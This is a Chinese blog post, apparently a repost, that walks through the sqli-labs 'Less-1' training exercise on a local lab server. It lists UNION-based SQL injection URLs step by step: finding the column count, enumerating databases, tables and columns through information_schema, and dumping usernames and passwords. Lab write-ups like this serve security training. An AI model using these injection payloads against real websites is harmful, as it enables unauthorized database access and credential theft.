首页 > 其他 > 详细

Less-1 Error Based -String

时间:2021-08-10 23:36:08      阅读:31      评论:0      收藏:0      [点我收藏+]

 

1.打开页面后提示我们以id为参数并赋值

技术分享图片

 

 

 

2.我们在url中构造?id =1,返回以下内容。

技术分享图片

 

 

 

 3.我们构造http://127.0.0.1/sql/Less-1/?id=1‘and 1=2,可以发现页面没什么变化,然后在1后加一个‘,返回以下内容,由此可知为字符型注入。

技术分享图片

 

 

 

4.使用 union 或者order by 判断 字段数。

http://127.0.0.1/sql/Less-1/?id=1‘20union select null,null,null%20--+,如图当 null 的个数为3后数值显示正常了。

技术分享图片

 

 

 http://127.0.0.1/sql/Less-1/?id=1‘ order by 4--+ 也可以判断。

 

5.使用union select 显示字段值

http://www.sqli-lab.cn/Less-1/?id=1‘ and 1=2 union select 1,version(),database() --+

6.查询数据库名

http://127.0.0.1/sql/Less-1/?id=1‘ AND 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

技术分享图片

 

 

 7.查询表名

http://127.0.0.1/sql/Less-1/?id=1‘ AND 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=‘security‘)--+

 

技术分享图片

 

 

 8.获取列名

http://127.0.0.1/sql/Less-1/?id=1‘ AND 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=‘users‘) --+

技术分享图片

 

 9.爆出用户名密码

?id=1‘ AND 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+

  技术分享图片

 

Less-1 Error Based -String

原文:https://www.cnblogs.com/daomiao/p/15125900.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!